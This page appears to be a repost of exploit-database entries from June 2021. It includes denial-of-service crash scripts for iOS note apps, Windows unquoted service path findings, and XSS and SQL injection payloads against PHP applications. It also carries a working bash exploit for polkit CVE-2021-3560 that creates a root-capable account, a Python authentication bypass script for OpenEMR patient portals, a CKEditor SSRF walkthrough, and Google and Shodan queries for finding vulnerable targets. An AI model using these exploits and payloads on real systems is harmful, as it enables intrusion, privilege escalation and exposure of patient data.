All posts published by ISHACK AI BOT
-
Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)
# Exploit Title: Secure Notepad Private Notes 3.0.3 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/secure-notepad-private-notes/id711178888
# Version: 3.0.3
# Category: DoS (iOS)

##### Vulnerability #####

Secure Notepad - Private Notes is vulnerable to a DoS condition when a long string of characters is used when creating a note:

# STEPS #

# Open the program.
# Create a new Note.
# Run the python exploit script payload.py; it will create a new payload.txt file.
# Copy the content of the file "payload.txt".
# Paste the content from payload.txt twice in the new Note.
# Crashed

Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.

##### PoC #####

--> payload.py <--

#!/usr/bin/env python
# 350,000 'A' (0x41) characters written to payload.txt
buffer = "\x41" * 350000
try:
    f = open("payload.txt", "w")
    f.write(buffer)
    f.close()
    print("File created")
except:
    print("File cannot be created")
-
Post-it 5.0.1 - Denial of Service (PoC)
# Exploit Title: Post-it 5.0.1 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/es/app/post-it/id920127738
# Version: 5.0.1
# Category: DoS (iOS)

##### Vulnerability #####

Post-it is vulnerable to a DoS condition when a long string of characters is used when creating a note:

# STEPS #

# Open the program.
# Create a new Note.
# Run the python exploit script payload.py; it will create a new payload.txt file.
# Copy the content of the file "payload.txt".
# Paste the content from payload.txt twice in the new Note.
# Crashed

Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.

##### PoC #####

--> payload.py <--

#!/usr/bin/env python
# 350,000 'A' (0x41) characters written to payload.txt
buffer = "\x41" * 350000
try:
    f = open("payload.txt", "w")
    f.write(buffer)
    f.close()
    print("File created")
except:
    print("File cannot be created")
-
Notex the best notes 6.4 - Denial of Service (PoC)
# Exploit Title: Notex the best notes 6.4 - Denial of Service (PoC)
# Date: 06-14-2021
# Author: Geovanni Ruiz
# Download Link: https://apps.apple.com/us/app/notex-the-best-notes/id847994217
# Version: 6.4
# Category: DoS (iOS)

##### Vulnerability #####

Notex – the best notes is vulnerable to a DoS condition when a long string of characters is used when creating a note:

# STEPS #

# Open the program.
# Create a new Note.
# Run the python exploit script payload.py; it will create a new payload.txt file.
# Copy the content of the file "payload.txt".
# Paste the content from payload.txt twice in the new Note.
# Crashed

Successful exploitation will cause the application to stop working.
I have been able to test this exploit against iOS 14.2.

##### PoC #####

--> payload.py <--

#!/usr/bin/env python
# 350,000 'A' (0x41) characters written to payload.txt
buffer = "\x41" * 350000
try:
    f = open("payload.txt", "w")
    f.write(buffer)
    f.close()
    print("File created")
except:
    print("File cannot be created")
-
Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path
# Exploit Title: Tftpd64 4.64 - 'Tftpd32_svc' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 14-06-2021
# Vendor Homepage: https://bitbucket.org/phjounin/tftpd64/src/master/
# Software Links: https://bitbucket.org/phjounin/tftpd64/wiki/Download%20Tftpd64.md
# Tested Version: 4.64
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Tftpd32 service edition    Tftpd32_svc    C:\Program Files\Tftpd64_SE\tftpd64_svc.exe    Auto

C:\Users\IEUser>sc qc Tftpd32_svc
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Tftpd32_svc
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 1   NORMAL
        NOMBRE_RUTA_BINARIO    : C:\Program Files\Tftpd64_SE\tftpd64_svc.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : Tftpd32 service edition
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem
-
Brother BRPrint Auditor - 'Multiple' Unquoted Service Path
# Exploit Title: Brother BRPrint Auditor 3.0.7 - 'Multiple' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 14-06-2021
# Vendor Homepage: https://support.brother.com/
# Software Links: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=dcp7060d_all&os=10013&dlid=dlf102753_000&flang=4&type3=214
# Tested Version: 3.0.7
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

BrPrAuSvc                        BrAuSvc       C:\Program Files (x86)\Brother\BRPrintAuditor\Brsvau3a.exe    Auto
Brother BRPrintAuditor Agent     BRPA_Agent    C:\Program Files (x86)\Brother\BRPrintAuditor\BRAgtSrv.exe    Auto

C:\Users\IEUser>sc qc BrAuSvc
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: BrAuSvc
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 1   NORMAL
        NOMBRE_RUTA_BINARIO    : C:\Program Files (x86)\Brother\BRPrintAuditor\Brsvau3a.exe
        GRUPO_ORDEN_CARGA      : BrotherSplGroup
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : BrPrAuSvc
        DEPENDENCIAS           : Spooler
        NOMBRE_INICIO_SERVICIO : LocalSystem

C:\Users\IEUser>sc qc BRPA_Agent
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: BRPA_Agent
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 1   NORMAL
        NOMBRE_RUTA_BINARIO    : C:\Program Files (x86)\Brother\BRPrintAuditor\BRAgtSrv.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : Brother BRPrintAuditor Agent
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem
-
Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)
# Exploit Title: Client Management System 1.1 - 'username' Stored Cross-Site Scripting (XSS)
# Date: 14 June 2021
# Exploit Author: BHAVESH KAUL
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
# Version: 1.1
# Tested on: Server: XAMPP

# Description #

Client Management System 1.1 is vulnerable to stored cross-site scripting because of insufficient sanitization of user-supplied data.

# Proof of Concept (PoC) : Exploit #

1) Go to: http://localhost/clientms/admin/index.php
2) Login as admin using test credentials: admin/Test@123
3) Go to: http://localhost/clientms/admin/admin-profile.php
4) Enter the following payload in the user name field: <script>alert(1)</script>
5) Click on Update
6) Our payload is fired and stored
-
Client Management System 1.1 - 'Search' SQL Injection
# Exploit Title: Client Management System 1.1 - 'Search' SQL Injection
# Date: 14 June 2021
# Exploit Author: BHAVESH KAUL
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/
# Version: 1.1
# Tested on: Server: XAMPP

# Description #

Client Management System 1.1 is vulnerable to SQL Injection in the admin panel 'search invoices' field because of insufficient sanitization of user-supplied data.

# Proof of Concept (PoC) : Exploit #

1) Go to: http://localhost/clientms/admin/index.php
2) Login as admin using test credentials: admin/Test@123
3) Go to: http://localhost/clientms/admin/search-invoices.php
4) Enter the following payload in the search field: ' OR 'x'='x
5) All results are shown instead of none ==> SQL Injection success
-
SysGauge 7.9.18 - ' SysGauge Server' Unquoted Service Path
# Exploit Title: SysGauge 7.9.18 - 'SysGauge Server' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 14-06-2021
# Vendor Homepage: https://www.sysgauge.com
# Software Link: https://www.sysgauge.com/setups/sysgaugesrv_setup_v7.9.18.exe
# Tested Version: 7.9.18
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

C:\>sc qc "SysGauge Server"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SysGauge Server
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 0   IGNORE
        NOMBRE_RUTA_BINARIO    : C:\Program Files\SysGauge Server\bin\sysgaus.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : SysGauge Server
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem
-
Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path
# Exploit Title: Brother BRAgent 1.38 - 'WBA_Agent_Client' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 14-06-2021
# Vendor Homepage: https://brother.com
# Software Link: https://support.brother.com/g/b/downloadhowto.aspx?c=us&lang=en&prod=ads1000w_us&os=10013&dlid=dlf002778_000&flang=4&type3=46
# Tested Version: 1.38
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Brother BRAgent    WBA_Agent_Client    C:\Program Files (x86)\Brother\BRAgent\BRAgtSrv.exe    Auto

C:\>sc qc WBA_Agent_Client
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: WBA_Agent_Client
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 1   NORMAL
        NOMBRE_RUTA_BINARIO    : C:\Program Files (x86)\Brother\BRAgent\BRAgtSrv.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : Brother BRAgent
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem
-
Polkit 0.105-26 0.117-2 - Local Privilege Escalation
# Exploit Title: Polkit 0.105-26 0.117-2 - Local Privilege Escalation
# Date: 06/11/2021
# Exploit Author: J Smith (CadmusofThebes)
# Vendor Homepage: https://www.freedesktop.org/
# Software Link: https://www.freedesktop.org/software/polkit/docs/latest/polkitd.8.html
# Version: polkit 0.105-26 (Ubuntu), polkit 0.117-2 (Fedora)
# Tested on: Ubuntu 20.04, Fedora 33
# CVE: CVE-2021-3560
# Source: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

#!/bin/bash

# Set the name and display name
userName="hacked"
realName="hacked"

# Set the account as an administrator
accountType=1

# Set the password hash for 'password' and password hint
password='$5$WR3c6uwMGQZ/JEZw$OlBVzagNJswkWrKRSuoh/VCrZv183QpZL7sAeskcoTB'
passHint="password"

# Check Polkit version
polkitVersion=$(systemctl status polkit.service | grep version | cut -d " " -f 9)
if [[ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 || "$(yum list installed | grep polkit | grep -c 0.117-2)" ]]; then
    echo "[*] Vulnerable version of polkit found"
else
    echo "[!] WARNING: Version of polkit might not vulnerable"
fi

# Validate user is running in SSH instead of desktop terminal
if [[ -z $SSH_CLIENT || -z $SSH_TTY ]]; then
    echo "[!] WARNING: SSH into localhost first before running this script in order to avoid authentication prompts"
    exit
fi

# Test the dbus-send timing to load into exploit
echo "[*] Determining dbus-send timing"
realTime=$( TIMEFORMAT="%R"; { time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType ; } 2>&1 | cut -d " " -f6 )
halfTime=$(echo "scale=3;$realTime/2" | bc)

# Check for user first in case previous run of script failed on password set
if id "$userName" &>/dev/null; then
    userid=$(id -u $userName)
    echo "[*] New user $userName already exists with uid of $userid"
else
    userid=""
    echo "[*] Attempting to create account"
    while [[ $userid == "" ]]
    do
        dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:$userName string:$realName int32:$accountType 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null
        if id "$userName" &>/dev/null; then
            userid=$(id -u $userName)
            echo "[*] New user $userName created with uid of $userid"
        fi
    done
fi

# Add the password to /etc/shadow
# Sleep added to ensure there is enough of a delay between timestamp checks
echo "[*] Adding password to /etc/shadow and enabling user"
sleep 1
currentTimestamp=$(stat -c %Z /etc/shadow)
fileChanged="n"
while [ $fileChanged == "n" ]
do
    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User$userid org.freedesktop.Accounts.User.SetPassword string:$password string:$passHint 2>/dev/null & sleep $halfTime ; kill $! 2>/dev/null
    if [ $(stat -c %Z /etc/shadow) -ne $currentTimestamp ];then
        fileChanged="y"
        echo "[*] Exploit complete!"
    fi
done

echo ""
echo "[*] Run 'su - $userName', followed by 'sudo su' to gain root access"
-
DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path
# Exploit Title: DiskPulse 13.6.14 - 'Multiple' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 14-06-2021
# Vendor Homepage: https://www.diskpulse.com
# Software Links:
# https://www.diskpulse.com/setups_x64/diskpulseent_setup_v13.6.14_x64.exe
# https://www.diskpulse.com/setups_x64/diskpulsesrv_setup_v13.6.14_x64.exe
# Tested Version: 13.6.14
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Disk Pulse Enterprise    Disk Pulse Enterprise    C:\Program Files\Disk Pulse Enterprise\bin\diskpls.exe    Auto
Disk Pulse Server        Disk Pulse Server        C:\Program Files\Disk Pulse Server\bin\diskpls.exe        Auto

C:\Users\IEUser>sc qc "Disk Pulse Enterprise"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Disk Pulse Enterprise
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 0   IGNORE
        NOMBRE_RUTA_BINARIO    : C:\Program Files\Disk Pulse Enterprise\bin\diskpls.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : Disk Pulse Enterprise
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem

C:\Users\IEUser>sc qc "Disk Pulse Server"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Disk Pulse Server
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 0   IGNORE
        NOMBRE_RUTA_BINARIO    : C:\Program Files\Disk Pulse Server\bin\diskpls.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : Disk Pulse Server
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem
-
Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path
# Exploit Title: Disk Sorter Server 13.6.12 - 'Disk Sorter Server' Unquoted Service Path
# Discovery by: BRushiran
# Date: 15-06-2021
# Vendor Homepage: https://www.disksorter.com
# Software Links: https://www.disksorter.com/setups_x64/disksortersrv_setup_v13.6.12_x64.exe
# Tested Version: 13.6.12
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Disk Sorter Server    Disk Sorter Server    C:\Program Files\Disk Sorter Server\bin\disksrs.exe    Auto

C:\>sc qc "Disk Sorter Server"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Disk Sorter Server
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 0   IGNORE
        NOMBRE_RUTA_BINARIO    : C:\Program Files\Disk Sorter Server\bin\disksrs.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : Disk Sorter Server
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem
-
Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path
# Exploit Title: Disk Sorter Enterprise 13.6.12 - 'Disk Sorter Enterprise' Unquoted Service Path
# Discovery by: BRushiran
# Date: 15-06-2021
# Vendor Homepage: https://www.disksorter.com
# Software Links: https://www.disksorter.com/setups_x64/disksorterent_setup_v13.6.12_x64.exe
# Tested Version: 13.6.12
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Disk Sorter Enterprise    Disk Sorter Enterprise    C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe    Auto

C:\>sc qc "Disk Sorter Enterprise"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: Disk Sorter Enterprise
        TIPO                   : 10  WIN32_OWN_PROCESS
        TIPO_INICIO            : 2   AUTO_START
        CONTROL_ERROR          : 0   IGNORE
        NOMBRE_RUTA_BINARIO    : C:\Program Files\Disk Sorter Enterprise\bin\disksrs.exe
        GRUPO_ORDEN_CARGA      :
        ETIQUETA               : 0
        NOMBRE_MOSTRAR         : Disk Sorter Enterprise
        DEPENDENCIAS           :
        NOMBRE_INICIO_SERVICIO : LocalSystem
-
Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting
# Exploit Title: Cotonti Siena 0.9.19 - 'maintitle' Stored Cross-Site Scripting
# Date: 2021-15-06
# Exploit Author: Fatih İLGİN
# Vendor Homepage: cotonti.com
# Vulnerable Software: https://www.cotonti.com/download/siena_0919
# Affected Version: 0.9.19
# Tested on: Windows 10
# Vulnerable Parameter Type: POST
# Vulnerable Parameter: maintitle
# Attack Pattern: "><img src=1 href=1 onerror="javascript:alert(1)"></img>

# Description

1) Enter the Admin Panel (vulnerableapplication.com/cotonti/admin.php)
2) Go to the Configuration tab and set the payload ("><img src=1 href=1 onerror="javascript:alert(1)"></img>) for the Site title param
3) Click the Update button
4) Finally, go to the home page; the triggered vulnerability is shown

# Proof of Concepts

Request;

POST /cotonti/admin.php?m=config&n=edit&o=core&p=title&a=update HTTP/1.1
Host: vulnerableapplication.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 440
Origin: https://vulnerableapplication.com
Connection: close
Referer: https://vulnerableapplication/cotonti/admin.php?m=config&n=edit&o=core&p=title
Cookie: __cmpconsentx19318=CPH17mBPH17mBAfUmBENBeCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPH17mCgAADAAXAA0AB4AQ4DiQKnAAA; _ga=GA1.2.1498194981.1623770561; _gid=GA1.2.1196246770.1623770561; __gads=ID=63f33aa9dd32c83c-220723d35ec800e9:T=1623770613:RT=1623770613:S=ALNI_MZ0ifDGVpIXuopc8JXvo208SRTYmA; PHPSESSID=ahmanvhckp2o5g5rnpr4cnj9c3

&x=701dad27076b1d78&maintitle=%22%3E%3Cimg+src%3D1+href%3D1+onerror%3D%22javascript%3Aalert(1)%22%3E%3C%2Fimg%3E&subtitle=Subtitle&metakeywords=&title_users_details=%7BUSER%7D%3A+%7BNAME%7D&title_header=%7BSUBTITLE%7D+-+%7BMAINTITLE%7D&title_header_index=%7BMAINTITLE%7D+-+%7BDESCRIPTION%7D&subject_mail=%7BSITE_TITLE%7D+-+%7BMAIL_SUBJECT%7D&body_mail=%7BMAIL_BODY%7D%0D%0A%0D%0A%7BSITE_TITLE%7D+-+%7BSITE_URL%7D%0D%0A%7BSITE_DESCRIPTION%7D

Response;

HTTP/1.1 200 OK
Date: Tue, 15 Jun 2021 16:07:59 GMT
Server: Apache
Expires: Mon, Apr 01 1974 00:00:00 GMT
Cache-Control: no-store,no-cache,must-revalidate, post-check=0,pre-check=0
Pragma: no-cache
Last-Modified: Tue, 15 Jun 2021 04:07:59 GMT
Vary: Accept-Encoding
X-Robots-Tag: noindex,nofollow
Content-Length: 4366
Connection: close
Content-Type: text/html; charset=UTF-8

<h1 class="body"><a href="admin.php" title="Administration panel">Administration panel</a> / <a href="admin.php?m=config" title="Configuration">Configuration</a> / <a href="admin.php?m=config&n=edit&o=core&p=title" title="Titles and Metas">Titles and Metas</a></h1>
<div id="main" class="body clear">
<h2>Configuration</h2>
<div class="done">
<h4>Done</h4>
<ul>
<li>Updated</li>
</ul>
</div>
-
OpenEMR 5.0.1.3 - Authentication Bypass
# Exploit Title: OpenEMR 5.0.1.3 - '/portal/account/register.php' Authentication Bypass
# Date 15.06.2021
# Exploit Author: Ron Jost (Hacker5preme)
# Vendor Homepage: https://www.open-emr.org/
# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip
# Version: All versions prior to 5.0.1.4
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-15152
# CWE: CWE-287
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15152-Exploit

'''
Description:
An unauthenticated user is able to bypass the Patient Portal Login by simply navigating to the registration page
and modifying the requested url to access the desired page. Some examples of pages in the portal directory that
are accessible after browsing to the registration page include:
- add_edit_event_user.php
- find_appt_popup_user.php
- get_allergies.php
- get_amendments.php
- get_lab_results.php
- get_medications.php
- get_patient_documents.php
- get_problems.php
- get_profile.php
- portal_payment.php
- messaging/messages.php
- messaging/secure_chat.php
- report/pat_ledger.php
- report/portal_custom_report.php
- report/portal_patient_report.php
Normally, access to these pages requires authentication as a patient. If a user were to visit any of those pages
unauthenticated, they would be redirected to the login page.
'''

'''
Import required modules:
'''
import requests
import argparse

'''
User-Input:
'''
my_parser = argparse.ArgumentParser(description='OpenEMR Authentication bypass')
my_parser.add_argument('-T', '--IP', type=str)
my_parser.add_argument('-P', '--PORT', type=str)
my_parser.add_argument('-U', '--Openemrpath', type=str)
my_parser.add_argument('-R', '--PathToGet', type=str)
args = my_parser.parse_args()
target_ip = args.IP
target_port = args.PORT
openemr_path = args.Openemrpath
pathtoread = args.PathToGet

'''
Check for vulnerability:
'''
# Check if the Registration portal is enabled. If it is not, this exploit can not work
session = requests.Session()
check_vuln_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/portal/account/register.php'
check_vuln = session.get(check_vuln_url).text
print('')
print('[*] Checking vulnerability: ')
print('')
if "Enter email address to receive registration." in check_vuln:
    print('[+] Host Vulnerable. Proceeding exploit')
else:
    print('[-] Host is not Vulnerable: Registration for patients is not enabled')

'''
Exploit:
'''
header = {
    'Referer': check_vuln_url
}
exploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + pathtoread
Exploit = session.get(exploit_url, headers=header)
print('')
print('[+] Results: ')
print('')
print(Exploit.text)
print('')
-
Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)
# Exploit Title: Teachers Record Management System 1.0 – Multiple SQL Injection (Authenticated)
# Date: 05-10-2021
# Exploit Author: nhattruong
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 + XAMPP v3.2.4

POC:
1. Go to url http://localhost/login.php
2. Login with default creds
3. Execute the payload

Payload #1:

POST /admin/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
Origin: http://localhost
Connection: close
Referer: http://localhost/trms/admin/search.php
Cookie: PHPSESSID=4c4g8dedr7omt9kp1j7d6v6fg0
Upgrade-Insecure-Requests: 1

searchdata=a' or 1=1-- -&search=

Payload #2:
http://local/admin/edit-subjects-detail.php?editid=a' or 1=1-- -

Payload #3:
http://local/admin/edit-teacher-detail.php?editid=a' or 1=1-- -
-
Teachers Record Management System 1.0 - 'email' Stored Cross-site Scripting (XSS)
# Exploit Title: Teachers Record Management System 1.0 – 'email' Stored Cross-site Scripting (XSS)
# Date: 05-10-2021
# Exploit Author: nhattruong
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 + XAMPP v3.2.4

POC:
1. Go to url http://localhost/admin/index.php
2. Do login
3. Execute the payload
4. Reload the page to see the difference

Payload:

POST /admin/adminprofile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://localhost
Connection: close
Referer: http://localhost/trms/admin/adminprofile.php
Cookie: PHPSESSID=8vkht2tvbo774tsjke1t739i7l
Upgrade-Insecure-Requests: 1

adminname=Adminm&username=admin&mobilenumber=8979555556&email="><script>alert(123);</script>&submit=
-
CKEditor 3 - Server-Side Request Forgery (SSRF)
# Exploit Title: CKEditor 3 - Server-Side Request Forgery (SSRF)
# Google Dorks : inurl /editor/filemanager/connectors/uploadtest.html
# Date: 12-6-2021
# Exploit Author: Blackangel
# Software Link: https://ckeditor.com/
# Version: all versions under 4 (1, 2, 3)
# Tested on: Windows 7

Steps of Exploit:-
1- Use the Google dork inurl /editor/filemanager/connectors/uploadtest.html
2- After going to the vulnerable page you will find the field "Custom Uploader URL:"
3- Right click, then choose Inspect Element, click on "pick an element from the page", and select the field Custom Uploader URL:
4- In Elements, find "<input id="txtCustomUrl" style="WIDTH: 100%; BACKGROUND-COLOR: #dcdcdc" disabled="" type="text">" and delete disabled=""
5- Now you can put in a URL starting with any protocol
6- Send it to the server; as you will see, the website whose link you entered appears in the page.

What does this mean? You send a request to the server through the vulnerable website, so it can be used as a proxy:
hackers >>> vulnerable website >>> http://xx.com
So in the http://xx.com logs the requests come from the vulnerable website.

Impact:-
1- This allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker's choosing. If a big company uses the old version, hackers can send requests via its websites, which is not good for the reputation of the company.
2- A big company's website can end up on a blacklist of websites, because hackers can send many requests via the vulnerable website.

Mitigation:-
Remove the uploadtest.html file as it is not used by the application.
-
Unified Office Total Connect Now 1.0 - 'data' SQL Injection
# Exploit Title: Unified Office Total Connect Now 1.0 – 'data' SQL Injection
# Shodan Filter: http.title:"TCN User Dashboard"
# Date: 06-16-2021
# Exploit Author: Ajaikumar Nadar
# Vendor Homepage: https://unifiedoffice.com/
# Software Link: https://unifiedoffice.com/voip-business-solutions/
# Version: 1.0
# Tested on: CentOS + Apache/2.2.15

POC:
1. Go to url http://localhost/operator/operatorLogin.php and login
2. Capture the request in Burpsuite and use the payload as given below.
3. Observe the response which reveals the DB version of mysql.

Request:

POST /operator/operatorLogin.php HTTP/1.1
Host: localhost
Connection: close
Content-Length: 178
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: https://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://localhost/operator/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=sosbriscgul9onu25sf2731e81

data={"extension":"((select 1 from (select count(*), concat(0x3a,0x3a,(select version()),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b))","pin":"bar"}

Response:

HTTP/1.1 400 Bad Request
Date: Wed, 16 Jun 2021 12:49:56 GMT
Server: Apache/2.2.15 (CentOS)
X-Powered-By: PHP/5.3.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 139
Connection: close
Content-Type: text/html; charset=UTF-8

Query failed, called from: sqlquery:/var/www/html/recpanel/operator/operatorLogin.php:62: Duplicate entry '::5.1.73::1' for key 'group_key'
-
